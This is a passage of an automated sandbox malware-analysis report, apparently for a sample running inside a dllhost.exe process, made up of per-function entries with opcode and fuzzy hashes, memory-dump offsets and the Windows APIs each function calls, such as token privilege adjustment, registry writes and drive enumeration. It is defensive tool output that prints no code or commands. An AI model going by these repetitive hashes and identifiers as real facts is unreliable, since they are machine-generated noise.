Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 808eb201e7c2c8d2fdfb3afd4a62bca0172a15800621a100d98bc69519636c88
Instruction ID: d0beb61cc2d920aa6c734be053f98a3b4be23dfd4cb5b9c9ff1c7d5a1b7d0650
Opcode Fuzzy Hash: 808eb201e7c2c8d2fdfb3afd4a62bca0172a15800621a100d98bc69519636c88
Instruction Fuzzy Hash: 4B900231044B0CCB459027957C09695775CA6446677800051A50D415515A5965555AD5

Function 04BC5548 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b4f28b0888610cbb59dccb74ffcba0b2f98944b2309e1cd3db25795f92fe7ee
Instruction ID: c3340ade87fb4abec72d4dbc78adeb2795e6fef9434a1916f08c17d45f1f47f5
Opcode Fuzzy Hash: 0b4f28b0888610cbb59dccb74ffcba0b2f98944b2309e1cd3db25795f92fe7ee
Instruction Fuzzy Hash:

Function 04BC6140 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27d41e38963b040d157207bbd897dd2a6ff8f913f142634dde95bf95ba631c81
Instruction ID: 20fe862b4280a1c04078eabd514a167e05a7b24f10a3013e13945bf6011a6f19
Opcode Fuzzy Hash: 27d41e38963b040d157207bbd897dd2a6ff8f913f142634dde95bf95ba631c81
Instruction Fuzzy Hash: B0900231044B0CCB455027957C09A55B75CA5446677804051A50D415525A69A41159A5

Function 04BC4AA8 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44b3cc7ba1c4684e31c041480ddb9a1e06e54eaef3398dc4a7fe5466383e2d6e
Instruction ID: 3dd60ad561153316f3ad8c9f762d0e437527666f7a0b1e563d54583eaf65e4a8
Opcode Fuzzy Hash: 44b3cc7ba1c4684e31c041480ddb9a1e06e54eaef3398dc4a7fe5466383e2d6e
Instruction Fuzzy Hash:

Function 04BC0E08 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91ec57ad95d155a58d72f1c070f31e7bb46d50a8cf32c76dee5140c75cd36b78
Instruction ID: a557c55d140ac10b72f8c488cfe9db2322798e2fe061bdbc6c1e1d2de7dfbc8f
Opcode Fuzzy Hash: 91ec57ad95d155a58d72f1c070f31e7bb46d50a8cf32c76dee5140c75cd36b78
Instruction Fuzzy Hash: 67900235054B0C8B864037957909569775DB5455157C50052A50D815226A556410C595

Function 04BC5658 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec7e21338b6e2959dcfd659a5635f81aa3a88f85aad8067306c96911318a30ba
Instruction ID: 9dd35a1e343d9ef93e876993cb28907eac2d65bc7b0e33d9946099cc05f04134
Opcode Fuzzy Hash: ec7e21338b6e2959dcfd659a5635f81aa3a88f85aad8067306c96911318a30ba
Instruction Fuzzy Hash: 2E900235044A1C8F4A8027D57809559775CB5456157D40152F50D415125A95641085A5

Function 04BC6650 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fa4d4df889e2883044c00a5665d559dde312338a37f41a9c88618ccb00eb3b6
Instruction ID: 93061bb6ab93dce34a8fde98cd96c95ce26df840b2421ff40255510471b98294
Opcode Fuzzy Hash: 5fa4d4df889e2883044c00a5665d559dde312338a37f41a9c88618ccb00eb3b6
Instruction Fuzzy Hash: AA90027604464D8B46402BD57809556B79CA5469157805051B50D426126A6664248596

Function 04BC33D8 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b8a48287273a1ee6b380002706db157832f055c4e54e47cd1746a901db1aa49
Instruction ID: abb2cfef9f3830823d55c57eb0e4f17ac1bdc86fbf255f41ff2fbb67b194d9a4
Opcode Fuzzy Hash: 0b8a48287273a1ee6b380002706db157832f055c4e54e47cd1746a901db1aa49
Instruction Fuzzy Hash:

Function 04BC5B30 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db75e865074c30c574731e708691d2a8dd230a997e2f3281c19d792212c4b813
Instruction ID: 26f2ecf659a91b636cdee425f68bd6c9c6bdb459b2d389eab8c3cbf5a663ce7b
Opcode Fuzzy Hash: db75e865074c30c574731e708691d2a8dd230a997e2f3281c19d792212c4b813
Instruction Fuzzy Hash: 5A900239044E0C8B455027957809599775CA9456267904051A50E415125A596554C5D5

Function 04BC3350 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7fa2263bc97cb0297208c5cf8a14d469d7a1156d6c412bdcc73c698897b64c6
Instruction ID: 2750d2a667c22864fcb631b9a9c2016866c9b6878674cfcb6a828f52c178f59a
Opcode Fuzzy Hash: f7fa2263bc97cb0297208c5cf8a14d469d7a1156d6c412bdcc73c698897b64c6
Instruction Fuzzy Hash:

Function 0485CFBF Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876536408.000000000485C000.00000040.00000800.00020000.00000000.sdmp, Offset: 0485C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_485c000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f7db271693c20342ff4e1f97970bb45d51b13797b88db6b5ae413179bf3acca
Instruction ID: f5f3f421c533c553b2ac30be53d211e19a71b1fc3c8683b197b6915eb21423a2
Opcode Fuzzy Hash: 4f7db271693c20342ff4e1f97970bb45d51b13797b88db6b5ae413179bf3acca
Instruction Fuzzy Hash: 6EB0127490021DCFC714DF10CD8C168F7B0BF48209F1046E4A41B92131DB301E80CE00

Function 04BC2E79 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f58cbcc66e8fff8336049ca7108d2cd49c66111c5f202ec8ea9bbf7b47c2034
Instruction ID: 4cfebdcdeb690fa19c836ce018619f57eadce69cd17564655a4f287d18e9f7fc
Opcode Fuzzy Hash: 3f58cbcc66e8fff8336049ca7108d2cd49c66111c5f202ec8ea9bbf7b47c2034
Instruction Fuzzy Hash: 0DA00279E84725CBF33C2B90D4597652522B745311F0544F9DE97522D0AD2A6C10F572

Function 0485E8C5 Relevance: .0, Instructions: 3COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876536408.000000000485C000.00000040.00000800.00020000.00000000.sdmp, Offset: 0485C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_485c000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d96236e2f073438c5aaa8ef2826a5037b87dbcb49eec495e2e98256b2d74ebf6
Instruction ID: f4222fb407edb91636278d835ce19bbc182ebaa02a5ce01efc699b18d79266d9
Opcode Fuzzy Hash: d96236e2f073438c5aaa8ef2826a5037b87dbcb49eec495e2e98256b2d74ebf6
Instruction Fuzzy Hash: CFA002BD514A1CDBD7414F64ECDC36D7E75F70531AF500907E81291261E7B51394DA12

Function 0485CF9C Relevance: .0, Instructions: 3COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876536408.000000000485C000.00000040.00000800.00020000.00000000.sdmp, Offset: 0485C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_485c000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c79e94d0b1e77e8ea8c904fa631131e72682bf5837ba3f33c051fa3a88c89f8b
Instruction ID: e23bab8ddbb781740769141b4786f2e17a93468810cbfa11087b3224521dacc5
Opcode Fuzzy Hash: c79e94d0b1e77e8ea8c904fa631131e72682bf5837ba3f33c051fa3a88c89f8b
Instruction Fuzzy Hash: ACA0023861421CDBD71C9B10DCDC668B771FB91746F0006A8E41B91471DB312E80DE08

Function 04BC1BF4 Relevance: .0, Instructions: 3COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c35d18f27d657f17bebe91cf70823b3f7ed0408d628c3e22942825c1f8122120
Instruction ID: a4f248fd063a395082d7916872a159a27b149a5024070549847bcb0d12ee73fe
Opcode Fuzzy Hash: c35d18f27d657f17bebe91cf70823b3f7ed0408d628c3e22942825c1f8122120
Instruction Fuzzy Hash: 12A00279618759CBD7118F54D84C35CBA71F706315F00414A9C47E6696D7B41484DE06

Analysis Process: dllhost.exePID: 6052, Parent PID: 660COMMON

Execution Graph

Execution Coverage:	12.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	66
Total number of Limit Nodes:	6

Executed Functions

Function 0063B32F Relevance: 1.6, APIs: 1, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0063B3AF

Memory Dump Source

Source File: 0000001A.00000002.1993118028.000000000063A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0063A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_63a000_dllhost.jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: ac81a7fe3cc64f1a73f9ac402e8c9d9b0f9aae293015ff4c5ab368cc88b4208e
Instruction ID: 3babb12ed344bee14de441fb4a1db09674fc14bdc3ade4fd3015402a6be298c2
Opcode Fuzzy Hash: ac81a7fe3cc64f1a73f9ac402e8c9d9b0f9aae293015ff4c5ab368cc88b4208e
Instruction Fuzzy Hash: 3F21D3755097809FEB12CF25DC40B92BFF4EF06310F0885DAE9858B163D331A808DBA1

Function 0063B4B1 Relevance: 1.6, APIs: 1, Instructions: 57nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0063B51D

Memory Dump Source

Source File: 0000001A.00000002.1993118028.000000000063A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0063A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_63a000_dllhost.jbxd

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 45c04e1d785b9f115807bbba04e5cc36b4bed5300fad8900c5e63692be64ee60
Instruction ID: c494509e83187cb003205132fdd6b00cffbfde2a18570d0bc2afcc5141a7d084
Opcode Fuzzy Hash: 45c04e1d785b9f115807bbba04e5cc36b4bed5300fad8900c5e63692be64ee60
Instruction Fuzzy Hash: 88119D724093C09FDB22CF15DC45A92FFB4EF16324F0D84DAE9848B263D265A918DB62

Function 0063B366 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0063B3AF

Memory Dump Source

Source File: 0000001A.00000002.1993118028.000000000063A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0063A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_63a000_dllhost.jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: d56eb778aba16ed9487cf7e54687f3f3c356d46b238a02e3620d4a1d5f08e678
Instruction ID: 001b8a1d8d9a103e68389dd841565aa5a47e2caca4fd459abadbc845d0653374
Opcode Fuzzy Hash: d56eb778aba16ed9487cf7e54687f3f3c356d46b238a02e3620d4a1d5f08e678
Instruction Fuzzy Hash: 5D1182755047449FEB21CF55D984B96FBE4EF04320F08C8AAEE458B651D335E814DFA1

Function 0063B4E2 Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0063B51D

Memory Dump Source

Source File: 0000001A.00000002.1993118028.000000000063A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0063A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_63a000_dllhost.jbxd

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 3368e086b79ce9be3d26646145903c433b8a3159dbeb5a61a5ea8cae23172cd3
Instruction ID: 953098d623b94a5f0a05b40c31b1aa6e030d4873bd5e30d6603e7923c92031ec
Opcode Fuzzy Hash: 3368e086b79ce9be3d26646145903c433b8a3159dbeb5a61a5ea8cae23172cd3
Instruction Fuzzy Hash: 7701AD754042409FEB21CF05D985B61FBE0EF08320F0CC49AEE494B262C376E828DFA2

Function 04840080 Relevance: 2.6, Strings: 2, Instructions: 73
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

:@Ul, xrefs: 04840100
dS|l, xrefs: 048401B9

Memory Dump Source

Source File: 0000001A.00000002.2258942700.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID: :@Ul$dS|l
API String ID: 0-1394735054
Opcode ID: ef044793b37c312786a0f87ed598cfad70b140287c7302d40b8219c6e35d88ed
Instruction ID: 1df2c6cb79644b5f1b85b5d9b1a3a18e6f0a119cc406cb9006253a317d2f1add
Opcode Fuzzy Hash: ef044793b37c312786a0f87ed598cfad70b140287c7302d40b8219c6e35d88ed
Instruction Fuzzy Hash: CE3191385006418BE308EB7AFE52258BBE27F88708F45C13EC5084B269EF7466298B81

Function 04840090 Relevance: 2.6, Strings: 2, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

:@Ul, xrefs: 04840100
dS|l, xrefs: 048401B9

Memory Dump Source

Source File: 0000001A.00000002.2258942700.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID: :@Ul$dS|l
API String ID: 0-1394735054
Opcode ID: cb7a5bb44aa5855206488f802f61f897f413d996cdc57b2f6c9f94058b5f64a9
Instruction ID: 6c5b52fc73dbac4f6baa1492413a25a27bdb5a2bd36f45cbdb975a2b940ebcd1
Opcode Fuzzy Hash: cb7a5bb44aa5855206488f802f61f897f413d996cdc57b2f6c9f94058b5f64a9
Instruction Fuzzy Hash: AF2141785006018BE348EB7AFE52259FBE27F88708F45C53EC5084B268EF7466258B91

Function 049B0A46 Relevance: 2.5, Strings: 2, Instructions: 16
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

5, xrefs: 049B0A6C
E, xrefs: 049B0A49

Memory Dump Source

Source File: 0000001A.00000002.2259583314.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_49b0000_dllhost.jbxd

Similarity

API ID:
String ID: 5$E
API String ID: 0-717204176
Opcode ID: e7badd7e6b12a266151052eba81f852a27d68ca6ec17a54eb2447bd3eedd0f1a
Instruction ID: 4320c5a44a022bb7891a14404e83b0fe62c1a1e583ba5a673cb92d3ecac30d1a
Opcode Fuzzy Hash: e7badd7e6b12a266151052eba81f852a27d68ca6ec17a54eb2447bd3eedd0f1a
Instruction Fuzzy Hash: 44D05E7080620BCFCB418F60981959C3BB5FF51315B44471DC0419E28ADA3D4515DB01

Function 049B0140 Relevance: 2.5, Strings: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

/, xrefs: 049B065E
B, xrefs: 049B0144

Memory Dump Source

Source File: 0000001A.00000002.2259583314.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_49b0000_dllhost.jbxd

Similarity

API ID:
String ID: /$B
API String ID: 0-2775194069
Opcode ID: b67605ab00fb455a9f6254483f1a0f17b5934791ce169021f68b5e11be154d7b
Instruction ID: 5dde3d6cccecdd3f5faeb9ce694d7f139826eb9c2e83cfd6ff0b25d1ddf39bd8
Opcode Fuzzy Hash: b67605ab00fb455a9f6254483f1a0f17b5934791ce169021f68b5e11be154d7b
Instruction Fuzzy Hash: C4D02B64906245CFDB005F6086183A83FB1AF11200F404AB5C14AAF3C3E93C54008752

Function 0063A793 Relevance: 1.6, APIs: 1, Instructions: 98
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0063A849

Memory Dump Source

Source File: 0000001A.00000002.1993118028.000000000063A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0063A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_63a000_dllhost.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: dafbb8220257dab9dc95817c68392ff5213f7f70d47dd593fe6bbd6ba3010cbe
Instruction ID: 68d9d1e200f581d3adf089ce5d4708f68ffd617a5375779179bf27d816e1c20d
Opcode Fuzzy Hash: dafbb8220257dab9dc95817c68392ff5213f7f70d47dd593fe6bbd6ba3010cbe
Instruction Fuzzy Hash: 0631C1B54053806FE722CB65CC44B62BFF8EF06314F08849EE9848B252D375A909DB72

Function 0063B62E Relevance: 1.6, APIs: 1, Instructions: 89
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNELBASE(?,?), ref: 0063B6D5

Memory Dump Source

Source File: 0000001A.00000002.1993118028.000000000063A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0063A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_63a000_dllhost.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 20fa178172fc09d4f4a82e2df014c99288fbb755bcdac0136f2fa745a0ff571a
Instruction ID: 711d36ed88ef480f9fded96d36db4b8df22ce3ddb0a7c943378ed543b7632fe3
Opcode Fuzzy Hash: 20fa178172fc09d4f4a82e2df014c99288fbb755bcdac0136f2fa745a0ff571a
Instruction Fuzzy Hash: CB318FB55093806FE711CB65CC85BA6BFF8EF46310F08849AE944CB292D375A909C762

Function 0063A120 Relevance: 1.6, APIs: 1, Instructions: 86
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindNextFileW.KERNELBASE(?,00000E24,?,?), ref: 0063A1C2

Memory Dump Source

Source File: 0000001A.00000002.1993118028.000000000063A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0063A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_63a000_dllhost.jbxd

Similarity

API ID: FileFindNext
String ID:
API String ID: 2029273394-0
Opcode ID: c27a5a961f520fec9691fd0a0b1d66560740367d8ab47a75fbd5cbf830be9ea7
Instruction ID: d3e8eacfb354306716a05e94b2873374fc852a2c1d03fcf67ee752f166852e32
Opcode Fuzzy Hash: c27a5a961f520fec9691fd0a0b1d66560740367d8ab47a75fbd5cbf830be9ea7
Instruction Fuzzy Hash: 5431827140D3C06FD3128B258C51BA6BFB4EF47610F0945DBD8849F2A3D229A91AD7B2

Function 0063AF4A Relevance: 1.6, APIs: 1, Instructions: 85
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNELBASE(?,00000E24,61998A8B,00000000,00000000,00000000,00000000), ref: 0063AFF0

Memory Dump Source

Source File: 0000001A.00000002.1993118028.000000000063A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0063A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_63a000_dllhost.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: e7808274184797ecddda251c0d6729e6ecb738087644a62aa55024159197c2da
Instruction ID: 42ae7eb9e3bcce2ba9fad6fc4792a268ab8055e970368d06415154091a8c4f59
Opcode Fuzzy Hash: e7808274184797ecddda251c0d6729e6ecb738087644a62aa55024159197c2da
Instruction Fuzzy Hash: 982181B65087405FE722CF51CC44FA6BBF8EF06310F08849AE985CB292D324E908D7A2

Function 0063A8A0 Relevance: 1.6, APIs: 1, Instructions: 80
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNELBASE(?,00000E24,61998A8B,00000000,00000000,00000000,00000000), ref: 0063A935

Memory Dump Source

Source File: 0000001A.00000002.1993118028.000000000063A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0063A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_63a000_dllhost.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 0906c179d591391dabfb603c581686dbd4209f47f5e1a53212bfc92ed2cf1a90
Instruction ID: 54fc794b2f3505a32ac7dc46419049ef40f5446e9e42fb940b029d6ccb8f0f8d
Opcode Fuzzy Hash: 0906c179d591391dabfb603c581686dbd4209f47f5e1a53212bfc92ed2cf1a90
Instruction Fuzzy Hash: E2210D754097805FE7128B21DC45BB6BFBCDF47720F0984DAE9849B293D2649D09C7B2

Function 0063B046 Relevance: 1.6, APIs: 1, Instructions: 77
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegSetValueExW.KERNELBASE(?,00000E24,61998A8B,00000000,00000000,00000000,00000000), ref: 0063B0DC

Memory Dump Source

Source File: 0000001A.00000002.1993118028.000000000063A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0063A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_63a000_dllhost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 972a9c6f58a0d22564d646fc184c5407fdb95d8c81730858c71fbaf0dab5ab99
Instruction ID: 726fdced37560e405fe98e580a4a78788a2cba0b237db8ea62c0c16b5e5623ef
Opcode Fuzzy Hash: 972a9c6f58a0d22564d646fc184c5407fdb95d8c81730858c71fbaf0dab5ab99
Instruction Fuzzy Hash: 3D2192765087806FE7228B11CC45FA7BFB8DF45310F08849AE9858B252D364E809CBB1

Function 0063A7CA Relevance: 1.6, APIs: 1, Instructions: 76
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0063A849

Memory Dump Source

Source File: 0000001A.00000002.1993118028.000000000063A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0063A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_63a000_dllhost.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: f500a28772f77a73913d8e77f9f01d4df423e20229c8f98243d911e7a7d2bea9
Instruction ID: fe2ef6747ffaa7aaafc3d1591e449512336cc18e2abe29f92bdf6d370a3e6d78
Opcode Fuzzy Hash: f500a28772f77a73913d8e77f9f01d4df423e20229c8f98243d911e7a7d2bea9
Instruction Fuzzy Hash: D3219275504240AFFB21CF65CD45BA6FBE8EF08314F08886EEA858B251D375E905DBB2

Function 0063AD1A Relevance: 1.6, APIs: 1, Instructions: 74
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLogicalDrives.KERNELBASE ref: 0063ADA1

Memory Dump Source

Source File: 0000001A.00000002.1993118028.000000000063A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0063A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_63a000_dllhost.jbxd

Similarity

API ID: DrivesLogical
String ID:
API String ID: 999431828-0
Opcode ID: 559c7aa80c6ddcdf60434c6fef0b2a5bd29a419a65d07dd4cdbf87f75431e030
Instruction ID: 3f37071b5d14e9e2b3ea3762b77618fe78474972c10af6335519da9a57e46f73
Opcode Fuzzy Hash: 559c7aa80c6ddcdf60434c6fef0b2a5bd29a419a65d07dd4cdbf87f75431e030
Instruction Fuzzy Hash: 19215C7140E3C05FD7038B658C55691BFB4EF47220F0A84DBD985CF1A3D2296809DB72

Function 0063B662 Relevance: 1.6, APIs: 1, Instructions: 72
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNELBASE(?,?), ref: 0063B6D5

Memory Dump Source

Source File: 0000001A.00000002.1993118028.000000000063A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0063A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_63a000_dllhost.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 1aaf396daeaf7e4cbf3cada8a033164f2d039f1daed574fe49c41989f4c07819
Instruction ID: 3d1ca1099f1601794c79558668735088af9640d35a70800e81b0c2fb1f71747b
Opcode Fuzzy Hash: 1aaf396daeaf7e4cbf3cada8a033164f2d039f1daed574fe49c41989f4c07819
Instruction Fuzzy Hash: 962195755042449FFB10DF25CD46BA6F7E8EF45314F08846AEE448B251D375E905CBB2

Function 0063AA52 Relevance: 1.6, APIs: 1, Instructions: 70
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNELBASE(?,00000E24,61998A8B,00000000,00000000,00000000,00000000), ref: 0063AAD1

Memory Dump Source

Source File: 0000001A.00000002.1993118028.000000000063A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0063A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_63a000_dllhost.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: f9b808531df69872383b08d22ab856d58591c8c6738c79f652e4b70353ead48e
Instruction ID: 4af7339ca898c1aae11e90bc9837718854a96c838b0794392973aa392e825cc5
Opcode Fuzzy Hash: f9b808531df69872383b08d22ab856d58591c8c6738c79f652e4b70353ead48e
Instruction Fuzzy Hash: EC218076409384AFEB22CF51DC44FA7FFB8EF45310F08849AE9858B152D275A508CBB2

Function 0063AF76 Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E24,61998A8B,00000000,00000000,00000000,00000000), ref: 0063AFF0

Memory Dump Source

Source File: 0000001A.00000002.1993118028.000000000063A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0063A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_63a000_dllhost.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 432bb97c3a79a74b0efa54c498cebeaef866c72ef26b5fbac3175f1a7cd9be45
Instruction ID: 2398f6cc66edc87f377aeced33c16f1bcab304f4e80268edd93b96b5ed6c7ce1
Opcode Fuzzy Hash: 432bb97c3a79a74b0efa54c498cebeaef866c72ef26b5fbac3175f1a7cd9be45
